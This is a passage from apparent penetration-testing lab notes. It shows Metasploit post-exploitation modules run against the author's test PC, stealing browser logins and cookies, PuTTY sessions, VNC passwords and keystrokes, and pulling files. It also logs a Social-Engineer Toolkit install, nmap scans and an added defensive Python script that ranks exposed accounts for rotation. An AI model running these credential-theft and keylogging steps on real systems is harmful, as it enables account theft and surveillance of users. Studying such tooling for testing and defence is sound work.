   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   MIGRATE  false            no        Automatically migrate to explorer.exe
   SESSION                   yes       The session to run this module on.
 
msf post(enum_chrome) > set SESSION 1
SESSION => 1
msf post(enum_chrome) > run
 
[*] Impersonating token: 6316
[*] Running as user 'ZTIK-PC\ZTiK'...
[*] Extracting data for user 'ZTiK'...
[*] Downloaded Web Data to '/home/ztik/.msf4/loot/20170220000643_default_10.0.2.13_chrome.raw.WebD_072799.txt'
[*] Downloaded Cookies to '/home/ztik/.msf4/loot/20170220000644_default_10.0.2.13_chrome.raw.Cooki_086840.txt'
[*] Downloaded History to '/home/ztik/.msf4/loot/20170220000644_default_10.0.2.13_chrome.raw.Histo_301300.txt'
[*] Downloaded Login Data to '/home/ztik/.msf4/loot/20170220000645_default_10.0.2.13_chrome.raw.Login_251299.txt'
[*] Downloaded Bookmarks to '/home/ztik/.msf4/loot/20170220000646_default_10.0.2.13_chrome.raw.Bookm_360246.txt'
[*] Downloaded Preferences to '/home/ztik/.msf4/loot/20170220000646_default_10.0.2.13_chrome.raw.Prefe_348157.txt'
[*] Post module execution completed
msf post(enum_chrome) >
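Once firefox_creds and enum_chrome have pulled these files, the incident-response question is which accounts to rotate first. The following added example (mine, not from this post, Metasploit, Mozilla or Google) reads a Firefox logins.json and a Chrome 'Login Data' SQLite database and merges them into one rotation list ordered by last use. Both inputs are constructed inline: the Chrome table carries only a subset of the real columns and the encrypted fields are placeholder bytes. Nothing is decrypted; the point is that the hostnames, usernames and timestamps sit in cleartext next to the encrypted secrets, so the copies alone already tell the responder which accounts are at stake.

```python
"""Which accounts to rotate after a browser credential store was copied.

Added example, not part of the original post, Metasploit, Mozilla or Google.
It reads a Firefox logins.json and a Chrome 'Login Data' SQLite database and
merges them into one rotation list, most recently used first. Both inputs are
constructed inline: the Chrome table carries only the columns this needs (the
real one has more) and the encrypted fields are placeholder bytes."""
import json
import sqlite3
from datetime import datetime, timedelta, timezone

# Constructed Firefox logins.json. Field names are Firefox's; hostnames are in
# cleartext, only username and password are encrypted (with the key in key3.db).
FIREFOX_LOGINS_JSON = json.dumps({
    "nextId": 3,
    "logins": [
        {"id": 1, "hostname": "https://login.skype.com", "httpRealm": None,
         "formSubmitURL": "https://login.skype.com",
         "usernameField": "username", "passwordField": "password",
         "encryptedUsername": "constructed-placeholder-1",
         "encryptedPassword": "constructed-placeholder-2",
         "guid": "{00000000-0000-4000-8000-000000000001}", "encType": 1,
         "timeCreated": 1480000000000, "timeLastUsed": 1487400000000,
         "timePasswordChanged": 1480000000000, "timesUsed": 12},
        {"id": 2, "hostname": "https://www.paypal.com", "httpRealm": None,
         "formSubmitURL": "https://www.paypal.com",
         "usernameField": "login_email", "passwordField": "login_password",
         "encryptedUsername": "constructed-placeholder-3",
         "encryptedPassword": "constructed-placeholder-4",
         "guid": "{00000000-0000-4000-8000-000000000002}", "encType": 1,
         "timeCreated": 1470000000000, "timeLastUsed": 1480000000000,
         "timePasswordChanged": 1470000000000, "timesUsed": 3},
    ],
    "disabledHosts": [],
    "version": 2,
})

# Chrome stores WebKit timestamps: microseconds since 1601-01-01 UTC.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(microseconds):
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def build_sample_chrome_login_data():
    """Constructed in-memory stand-in for Chrome's 'Login Data' file (column
    subset only). password_value is a DPAPI blob in the real file."""
    db = sqlite3.connect(":memory:")
    db.execute("""CREATE TABLE logins (
        origin_url VARCHAR NOT NULL, signon_realm VARCHAR NOT NULL,
        username_value VARCHAR, password_value BLOB,
        date_created INTEGER NOT NULL, date_last_used INTEGER NOT NULL DEFAULT 0,
        blacklisted_by_user INTEGER NOT NULL DEFAULT 0)""")
    rows = [
        ("https://www.amazon.com/ap/signin", "https://www.amazon.com/",
         "shopper@example.test", b"\x01\x00\x00\x00constructed-dpapi-blob",
         13120000000000000, 13135000000000000, 0),
        ("https://nl.facebook.com/login", "https://nl.facebook.com/",
         "someone@example.test", b"\x01\x00\x00\x00constructed-dpapi-blob",
         13100000000000000, 13130000000000000, 0),
        # blacklisted_by_user = 1 is "never save for this site": nothing to rotate
        ("https://example.test/login", "https://example.test/", "", b"",
         13100000000000000, 0, 1),
    ]
    db.executemany("INSERT INTO logins VALUES (?, ?, ?, ?, ?, ?, ?)", rows)
    db.commit()
    return db


def firefox_exposed_logins(logins_json_text):
    """[(hostname, last_used_utc)] for every saved login in logins.json."""
    doc = json.loads(logins_json_text)
    return [(entry["hostname"],
             datetime.fromtimestamp(entry["timeLastUsed"] / 1000, tz=timezone.utc))
            for entry in doc.get("logins", [])]


def chrome_exposed_logins(db):
    """[(signon_realm, username, last_used_utc)] for rows that hold a secret."""
    cur = db.execute("""SELECT signon_realm, username_value, date_last_used, date_created
                        FROM logins
                        WHERE blacklisted_by_user = 0 AND length(password_value) > 0""")
    out = []
    for realm, user, last_used, created in cur:
        when = last_used or created        # date_last_used is 0 until first reuse
        out.append((realm, user, webkit_to_datetime(when)))
    return out


def rotation_list(firefox_json_text, chrome_db):
    """Merge both stores into (browser, realm, username, last_used) tuples,
    most recently used first, so the hottest accounts are rotated first."""
    items = [("firefox", host, None, when)
             for host, when in firefox_exposed_logins(firefox_json_text)]
    items += [("chrome", realm, user, when)
              for realm, user, when in chrome_exposed_logins(chrome_db)]
    return sorted(items, key=lambda item: item[3], reverse=True)


if __name__ == "__main__":
    for browser, realm, user, when in rotation_list(FIREFOX_LOGINS_JSON,
                                                    build_sample_chrome_login_data()):
        print(f"{when:%Y-%m-%d} {browser:8} {realm} {user or ''}")
```

Two caveats the loot listings above illustrate. The Firefox profile copy includes key3.db next to logins.json, which is what makes the encrypted fields recoverable offline unless the user set a master password. Chrome's password_value is DPAPI-protected to the Windows user, which does not help against a session running as that user, as it does here. Treat every entry in the rotation list as compromised rather than trying to reason about which ones the attacker managed to decrypt.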

Steal PuTTY sessions

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/enum_putty_saved_sessions
msf post(enum_putty_saved_sessions) > show options
 
Module options (post/windows/gather/enum_putty_saved_sessions):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
 
msf post(enum_putty_saved_sessions) > set SESSION 1
SESSION => 1
msf post(enum_putty_saved_sessions) > run
 
[*] Looking for saved PuTTY sessions
[*] Found 4 sessions
 
PuTTY Saved Sessions
====================
 
 Name            HostName       UserName  PublicKeyFile  PortNumber  PortForwardings
 ----            --------       --------  -------------  ----------  ---------------
 VPS1            *.*.*.*                                 22       
 VPS3            *.*.*.*                                 22          
 MediaCenter     *.*.*.*        osmc                     22       
 WiFi Pineapple  *.*.*.*                                 22          
 
[*] PuTTY saved sessions list saved to /home/ztik/.msf4/loot/20170220001848_default_10.0.2.13_putty.sessions.c_047572.txt in CSV format & available in notes (use 'notes -t putty.savedsession' to view).
[*] Downloading private keys...
 
[*] Looking for previously stored SSH host key fingerprints
[*] Found 4 stored key fingerprints
[*] Downloading stored key fingerprints...
 
Stored SSH host key fingerprints
================================
 
 SSH Endpoint         Key Type(s)
 ------------         -----------
 *.*.*.*:22           rsa2
 *.*.*.*:22           rsa2
 *.*.*.*:22           rsa2
 *.*.*.*:22           rsa2
 
[*] PuTTY stored host keys list saved to /home/ztik/.msf4/loot/20170220001849_default_10.0.2.13_putty.storedfing_899849.txt in CSV format & available in notes (use 'notes -t putty.storedfingerprint' to view).
 
[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed
msf post(enum_putty_saved_sessions) > 

Steal VNC credentials

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/credentials/vnc
msf post(vnc) > show options
 
Module options (post/windows/gather/credentials/vnc):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
 
msf post(vnc) > set SESSION 1
SESSION => 1
msf post(vnc) > run
 
[*] Enumerating VNC passwords on ZTIK-PC
[*] Post module execution completed
msf post(vnc) > run
 
[*] Enumerating VNC passwords on ZTIK-PC
[+] Location: UltraVNC => Hash: A7F8FC867315B7FF5F => Password: 12345 => Port: 5900
[+] VIEW ONLY: UltraVNC => 89132B51B604FB804D => 54321 on port: 5900
[*] Post module execution completed

Steal Steam credentials

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/credentials/steam
msf post(steam) > show options
 
Module options (post/windows/gather/credentials/steam):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
 
msf post(steam) > set SESSION 1
SESSION => 1
msf post(steam) > run
 
[*] Checking for Steam configs in C:\Program Files (x86)\Steam\config
[*] Located steam config files.
[-] RememberPassword is not set, exiting.
[*] Post module execution completed
msf post(steam) >

Remote keylogging

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/capture/keylog_recorder
msf post(keylog_recorder) > show options
 
Module options (post/windows/capture/keylog_recorder):
 
   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CAPTURE_TYPE  explorer         no        Capture keystrokes for Explorer, Winlogon or PID (Accepted: explorer, winlogon, pid)
   INTERVAL      5                no        Time interval to save keystrokes in seconds
   LOCKSCREEN    false            no        Lock system screen.
   MIGRATE       false            no        Perform Migration.
   PID                            no        Process ID to migrate to
   SESSION                        yes       The session to run this module on.
 
msf post(keylog_recorder) > set SESSION 1
SESSION => 1
msf post(keylog_recorder) > run
 
[*] Executing module against ZTIK-PC
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /home/ztik/.msf4/loot/20170220004004_default_10.0.2.13_host.windows.key_571976.txt
[*] Recording keystrokes...
^C
[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
[*] Post module execution completed
msf post(keylog_recorder) > cat /home/ztik/.msf4/loot/20170220004004_default_10.0.2.13_host.windows.key_571976.txt
[*] exec: cat /home/ztik/.msf4/loot/20170220004004_default_10.0.2.13_host.windows.key_571976.txt
 
Keystroke log from payload.exe on ZTIK-PC with user ZTIK-PC\ZTiK started at 2017-02-20 00:40:04 +0100
 
 <LWin> rcmd
 <Return> dir <Return> exit
 <Return> 
 
Keylog Recorder exited at 2017-02-20 00:40:29 +0100
 
msf post(keylog_recorder) >

Search and download specific filetypes on remote host

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/enum_files
msf post(enum_files) > show options
 
Module options (post/windows/gather/enum_files):
 
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_GLOBS   *.config         yes       The file pattern to search for in a filename
   SEARCH_FROM                   no        Search from a specific location. Ex. C:\
   SESSION                       yes       The session to run this module on.
 
msf post(enum_files) > set SESSION 1
SESSION => 1
msf post(enum_files) > set SEARCH_FROM E:\\txts
SEARCH_FROM => E:\\txts
msf post(enum_files) > set FILE_GLOBS *.txt
FILE_GLOBS => *.txt
msf post(enum_files) > run
 
[*] Searching E:\txts
[*] Downloading E:\txts\test.txt
[+] test.txt saved as: /home/ztik/.msf4/loot/20170220004750_default_10.0.2.13_host.files_534281.txt
[*] Done!
[*] Post module execution completed
msf post(enum_files) >

Installing SET on Debian Jessie

ztik@unknownhost:~$ cd /opt
ztik@unknownhost:/opt$ git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
Cloning into 'set'...
remote: Counting objects: 108952, done.
remote: Total 108952 (delta 0), reused 0 (delta 0), pack-reused 108952
Receiving objects: 100% (108952/108952), 174.40 MiB | 6.89 MiB/s, done.
Resolving deltas: 100% (67445/67445), done.
Checking connectivity... done.
Checking out files: 100% (328/328), done.
ztik@unknownhost:/opt$ cd set
ztik@unknownhost:/opt/set$ sudo ./setup.py install
Reading package lists... Done
Building dependency tree       
Reading state information... Done
build-essential is already the newest version.
git is already the newest version.
git set to manually installed.
The following extra packages will be installed:
  apache2-data apache2-utils freetds-common libonig2 libqdbm14 libsybdb5 php5-cli php5-common php5-json php5-readline python-cffi python-cryptography python-ndg-httpsclient python-ply python-pyasn1
  python-pycparser python-urllib3
Suggested packages:
  apache2-doc apache2-suexec-pristine apache2-suexec-custom php-pear php5-user-cache python-dev python-crypto-dbg python-crypto-doc python-cryptography-doc python-cryptography-vectors python-openssl-doc
  python-openssl-dbg python-pexpect-doc python-ply-doc doc-base
The following NEW packages will be installed:
  apache2 apache2-data apache2-utils freetds-common libapache2-mod-php5 libonig2 libqdbm14 libsybdb5 php5-cli php5-common php5-json php5-readline python-cffi python-crypto python-cryptography
  python-ndg-httpsclient python-openssl python-pefile python-pexpect python-ply python-pyasn1 python-pycparser python-pymssql python-requests python-urllib3
0 upgraded, 25 newly installed, 0 to remove and 0 not upgraded.
Need to get 7,403 kB of archives.
After this operation, 29.0 MB of additional disk space will be used.
Get:1 http://ftp.nl.debian.org/debian/ jessie/main apache2-utils amd64 2.4.10-10+deb8u7 [195 kB]
Get:2 http://security.debian.org/ jessie/updates/main php5-common amd64 5.6.30+dfsg-0+deb8u1 [735 kB]
Get:3 http://ftp.nl.debian.org/debian/ jessie/main apache2-data all 2.4.10-10+deb8u7 [163 kB]
Get:4 http://ftp.nl.debian.org/debian/ jessie/main apache2 amd64 2.4.10-10+deb8u7 [208 kB]
Get:5 http://ftp.nl.debian.org/debian/ jessie/main libonig2 amd64 5.9.5-3.2 [118 kB]
Get:6 http://ftp.nl.debian.org/debian/ jessie/main freetds-common all 0.91-6 [57.9 kB]
Get:7 http://security.debian.org/ jessie/updates/main php5-cli amd64 5.6.30+dfsg-0+deb8u1 [2,200 kB]
Get:8 http://ftp.nl.debian.org/debian/ jessie/main libsybdb5 amd64 0.91-6+b1 [197 kB]
Get:9 http://security.debian.org/ jessie/updates/main libapache2-mod-php5 amd64 5.6.30+dfsg-0+deb8u1 [2,230 kB]
Get:10 http://security.debian.org/ jessie/updates/main php5-readline amd64 5.6.30+dfsg-0+deb8u1 [12.7 kB]
Get:11 http://ftp.nl.debian.org/debian/ jessie/main libqdbm14 amd64 1.8.78-5+b1 [118 kB]
Get:12 http://ftp.nl.debian.org/debian/ jessie/main php5-json amd64 1.3.6-1 [18.6 kB]
Get:13 http://ftp.nl.debian.org/debian/ jessie/main python-ply all 3.4-5 [62.9 kB]
Get:14 http://ftp.nl.debian.org/debian/ jessie/main python-pycparser all 2.10+dfsg-3 [58.8 kB]
Get:15 http://ftp.nl.debian.org/debian/ jessie/main python-cffi amd64 0.8.6-1 [67.2 kB]
Get:16 http://ftp.nl.debian.org/debian/ jessie/main python-crypto amd64 2.6.1-5+deb8u1 [256 kB]
Get:17 http://ftp.nl.debian.org/debian/ jessie/main python-cryptography amd64 0.6.1-1 [165 kB]
Get:18 http://ftp.nl.debian.org/debian/ jessie/main python-openssl all 0.14-1 [81.1 kB]
Get:19 http://ftp.nl.debian.org/debian/ jessie/main python-ndg-httpsclient all 0.3.2-1 [20.5 kB]
Get:20 http://ftp.nl.debian.org/debian/ jessie/main python-pexpect all 3.2-1 [38.4 kB]
Get:21 http://ftp.nl.debian.org/debian/ jessie/main python-pyasn1 all 0.1.7-1 [49.3 kB]
Get:22 http://ftp.nl.debian.org/debian/ jessie/main python-pymssql amd64 1.0.2+dfsg-1+b3 [51.9 kB]
Get:23 http://ftp.nl.debian.org/debian/ jessie/main python-urllib3 all 1.9.1-3 [55.4 kB]
Get:24 http://ftp.nl.debian.org/debian/ jessie/main python-requests all 2.4.3-6 [204 kB]
Get:25 http://ftp.nl.debian.org/debian/ jessie/main python-pefile all 1.2.9.1-1.1 [41.1 kB]
Fetched 7,403 kB in 2s (3,152 kB/s)        
Selecting previously unselected package apache2-utils.
(Reading database ... 153693 files and directories currently installed.)
Preparing to unpack .../apache2-utils_2.4.10-10+deb8u7_amd64.deb ...
Unpacking apache2-utils (2.4.10-10+deb8u7) ...
Selecting previously unselected package apache2-data.
Preparing to unpack .../apache2-data_2.4.10-10+deb8u7_all.deb ...
Unpacking apache2-data (2.4.10-10+deb8u7) ...
Selecting previously unselected package apache2.
Preparing to unpack .../apache2_2.4.10-10+deb8u7_amd64.deb ...
Unpacking apache2 (2.4.10-10+deb8u7) ...
Selecting previously unselected package libonig2:amd64.
Preparing to unpack .../libonig2_5.9.5-3.2_amd64.deb ...
Unpacking libonig2:amd64 (5.9.5-3.2) ...
Selecting previously unselected package freetds-common.
Preparing to unpack .../freetds-common_0.91-6_all.deb ...
Unpacking freetds-common (0.91-6) ...
Selecting previously unselected package libsybdb5:amd64.
Preparing to unpack .../libsybdb5_0.91-6+b1_amd64.deb ...
Unpacking libsybdb5:amd64 (0.91-6+b1) ...
Selecting previously unselected package libqdbm14.
Preparing to unpack .../libqdbm14_1.8.78-5+b1_amd64.deb ...
Unpacking libqdbm14 (1.8.78-5+b1) ...
Selecting previously unselected package php5-common.
Preparing to unpack .../php5-common_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking php5-common (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package php5-json.
Preparing to unpack .../php5-json_1.3.6-1_amd64.deb ...
Unpacking php5-json (1.3.6-1) ...
Selecting previously unselected package php5-cli.
Preparing to unpack .../php5-cli_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking php5-cli (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package libapache2-mod-php5.
Preparing to unpack .../libapache2-mod-php5_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking libapache2-mod-php5 (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package php5-readline.
Preparing to unpack .../php5-readline_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking php5-readline (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package python-ply.
Preparing to unpack .../python-ply_3.4-5_all.deb ...
Unpacking python-ply (3.4-5) ...
Selecting previously unselected package python-pycparser.
Preparing to unpack .../python-pycparser_2.10+dfsg-3_all.deb ...
Unpacking python-pycparser (2.10+dfsg-3) ...
Selecting previously unselected package python-cffi.
Preparing to unpack .../python-cffi_0.8.6-1_amd64.deb ...
Unpacking python-cffi (0.8.6-1) ...
Selecting previously unselected package python-crypto.
Preparing to unpack .../python-crypto_2.6.1-5+deb8u1_amd64.deb ...
Unpacking python-crypto (2.6.1-5+deb8u1) ...
Selecting previously unselected package python-cryptography.
Preparing to unpack .../python-cryptography_0.6.1-1_amd64.deb ...
Unpacking python-cryptography (0.6.1-1) ...
Selecting previously unselected package python-openssl.
Preparing to unpack .../python-openssl_0.14-1_all.deb ...
Unpacking python-openssl (0.14-1) ...
Selecting previously unselected package python-ndg-httpsclient.
Preparing to unpack .../python-ndg-httpsclient_0.3.2-1_all.deb ...
Unpacking python-ndg-httpsclient (0.3.2-1) ...
Selecting previously unselected package python-pexpect.
Preparing to unpack .../python-pexpect_3.2-1_all.deb ...
Unpacking python-pexpect (3.2-1) ...
Selecting previously unselected package python-pyasn1.
Preparing to unpack .../python-pyasn1_0.1.7-1_all.deb ...
Unpacking python-pyasn1 (0.1.7-1) ...
Selecting previously unselected package python-pymssql.
Preparing to unpack .../python-pymssql_1.0.2+dfsg-1+b3_amd64.deb ...
Unpacking python-pymssql (1.0.2+dfsg-1+b3) ...
Selecting previously unselected package python-urllib3.
Preparing to unpack .../python-urllib3_1.9.1-3_all.deb ...
Unpacking python-urllib3 (1.9.1-3) ...
Selecting previously unselected package python-requests.
Preparing to unpack .../python-requests_2.4.3-6_all.deb ...
Unpacking python-requests (2.4.3-6) ...
Selecting previously unselected package python-pefile.
Preparing to unpack .../python-pefile_1.2.9.1-1.1_all.deb ...
Unpacking python-pefile (1.2.9.1-1.1) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for systemd (215-17+deb8u6) ...
Setting up apache2-utils (2.4.10-10+deb8u7) ...
Setting up apache2-data (2.4.10-10+deb8u7) ...
Setting up apache2 (2.4.10-10+deb8u7) ...
Enabling module mpm_event.
Enabling module authz_core.
Enabling module authz_host.
Enabling module authn_core.
Enabling module auth_basic.
Enabling module access_compat.
Enabling module authn_file.
Enabling module authz_user.
Enabling module alias.
Enabling module dir.
Enabling module autoindex.
Enabling module env.
Enabling module mime.
Enabling module negotiation.
Enabling module setenvif.
Enabling module filter.
Enabling module deflate.
Enabling module status.
Enabling conf charset.
Enabling conf localized-error-pages.
Enabling conf other-vhosts-access-log.
Enabling conf security.
Enabling conf serve-cgi-bin.
Enabling site 000-default.
Setting up libonig2:amd64 (5.9.5-3.2) ...
Setting up freetds-common (0.91-6) ...
Setting up libsybdb5:amd64 (0.91-6+b1) ...
Setting up libqdbm14 (1.8.78-5+b1) ...
Setting up php5-common (5.6.30+dfsg-0+deb8u1) ...
 
Creating config file /etc/php5/mods-available/pdo.ini with new version
php5_invoke: Enable module pdo for apache2 SAPI
php5_invoke: Enable module pdo for cli SAPI
 
Creating config file /etc/php5/mods-available/opcache.ini with new version
php5_invoke: Enable module opcache for apache2 SAPI
php5_invoke: Enable module opcache for cli SAPI
Setting up php5-json (1.3.6-1) ...
php5_invoke: Enable module json for apache2 SAPI
php5_invoke: Enable module json for cli SAPI
Setting up php5-cli (5.6.30+dfsg-0+deb8u1) ...
update-alternatives: using /usr/bin/php5 to provide /usr/bin/php (php) in auto mode
update-alternatives: using /usr/bin/phar5 to provide /usr/bin/phar (phar) in auto mode
 
Creating config file /etc/php5/cli/php.ini with new version
Setting up libapache2-mod-php5 (5.6.30+dfsg-0+deb8u1) ...
 
Creating config file /etc/php5/apache2/php.ini with new version
Module mpm_event disabled.
Enabling module mpm_prefork.
apache2_switch_mpm Switch to prefork
apache2_invoke: Enable module php5
Setting up php5-readline (5.6.30+dfsg-0+deb8u1) ...
 
Creating config file /etc/php5/mods-available/readline.ini with new version
php5_invoke: Enable module readline for apache2 SAPI
php5_invoke: Enable module readline for cli SAPI
Setting up python-ply (3.4-5) ...
Setting up python-pycparser (2.10+dfsg-3) ...
Setting up python-cffi (0.8.6-1) ...
Setting up python-crypto (2.6.1-5+deb8u1) ...
Setting up python-cryptography (0.6.1-1) ...
Setting up python-openssl (0.14-1) ...
Setting up python-ndg-httpsclient (0.3.2-1) ...
Setting up python-pexpect (3.2-1) ...
Setting up python-pyasn1 (0.1.7-1) ...
Setting up python-pymssql (1.0.2+dfsg-1+b3) ...
Setting up python-urllib3 (1.9.1-3) ...
Setting up python-requests (2.4.3-6) ...
Setting up python-pefile (1.2.9.1-1.1) ...
Processing triggers for systemd (215-17+deb8u6) ...
Processing triggers for libc-bin (2.19-18+deb8u7) ...
Processing triggers for libapache2-mod-php5 (5.6.30+dfsg-0+deb8u1) ...
Processing triggers for python-support (1.0.15) ...
[*] Copying SET into the /usr/share/setoolkit directory...
[*] Installing setoolkit installer to /usr/bin/setoolkit...
 
[*] We are now finished! To run SET, type setoolkit...
ztik@unknownhost:/opt/set$ 

Running and updating SET

ztik@unknownhost:/opt/set$ setoolkit 
[-] New set.config.py file generated on: 2017-02-20 01:08:14.939622
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2017-02-20 01:08:14.939622
[*] SET is using the new config, no need to restart
Copyright 2017, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
 
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
 
    * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
    * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
 
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
 
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
 
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it).
 
Also note that by using this software, if you ever see the creator of SET in a bar, you should (optional) give him a hug and should (optional) buy him a beer (or bourbon - hopefully bourbon). Author has the option to refuse the hug (most likely will never happen) or the beer or bourbon (also most likely will never happen). Also by using this tool (these are all optional of course!), you should try to make this industry better, try to stay positive, try to help others, try to learn from one another, try stay out of drama, try offer free hugs when possible (and make sure recipient agrees to mutual hug), and try to do everything you can to be awesome.
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.
 
 
Do you agree to the terms of service [y/n]: Y
 
 
                          .  ..
                       MMMMMNMNMMMM=
                   .DMM.           .MM$
                 .MM.                 MM,.
                 MN.                    MM.
               .M.                       MM
              .M   .....................  NM
              MM   .8888888888888888888.   M7
             .M    88888888888888888888.   ,M
             MM       ..888.MMMMM    .     .M.
             MM         888.MMMMMMMMMMM     M
             MM         888.MMMMMMMMMMM.    M
             MM         888.      NMMMM.   .M
              M.        888.MMMMMMMMMMM.   ZM
              NM.       888.MMMMMMMMMMM    M:
              .M+      .....              MM.
               .MM.                     .MD
                 MM .                  .MM
                  $MM                .MM.
                    ,MM?          .MMM
                       ,MMMMMMMMMMM
 
                https://www.trustedsec.com
 
[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                       Version: 7.5
                     Codename: 'Ghost'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
 
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.
 
     Join us on irc.freenode.net in channel #setoolkit
 
   The Social-Engineer Toolkit is a product of TrustedSec.
 
           Visit: https://www.trustedsec.com
 
   Its easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
 
 
 Select from the menu:
 
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
 
  99) Exit the Social-Engineer Toolkit
 
set> 4
 
 
[-] Kali or BackBox Linux not detected, manually updating..
[-] Updating the Social-Engineer Toolkit, be patient...
[-] Performing cleanup first...
Removing src/agreement4
Removing src/logs/
[-] Updating... This could take a little bit...
Already up-to-date.
[*] The updating has finished, returning to main menu..
 
            :::===  :::===== :::====
            :::     :::      :::====
             =====  ======     ===
                === ===        ===
            ======  ========   ===
 
 
[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                       Version: 7.5
                     Codename: 'Ghost'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
 
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.
 
     Join us on irc.freenode.net in channel #setoolkit
 
   The Social-Engineer Toolkit is a product of TrustedSec.
 
           Visit: https://www.trustedsec.com
 
   Its easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
 
 
 Select from the menu:
 
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
 
  99) Exit the Social-Engineer Toolkit
 
set>

Insert some stuff about the Open Source Vulnerability DataBase… whenever I feel like doing that…


Insert some stuff about the OpenVAS… whenever I feel like doing that as well…


Passive Vulnerability Scanner by Tenable


Nexpose by Rapid7


SSDD, more stuff I still need to update :x


I wonder if I'll ever be done with putting online all my scripts, guides and other stuff…


Nmap version check

ztik@unknownhost:~$ nmap -V
 
Nmap version 7.40 ( https://nmap.org )
Platform: x86_64-unknown-linux-gnu
Compiled with: nmap-liblua-5.3.3 openssl-1.0.1t nmap-libpcre-7.6 nmap-libpcap-1.7.3 nmap-libdnet-1.12 ipv6
Compiled without:
Available nsock engines: epoll poll select

Nmap scan single IP

ztik@unknownhost:~$ nmap 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:20 CET
Nmap scan report for 10.0.2.15
Host is up (0.0042s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Nmap scan multiple IPs

ztik@unknownhost:~$ nmap 10.0.2.1-25
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:32 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
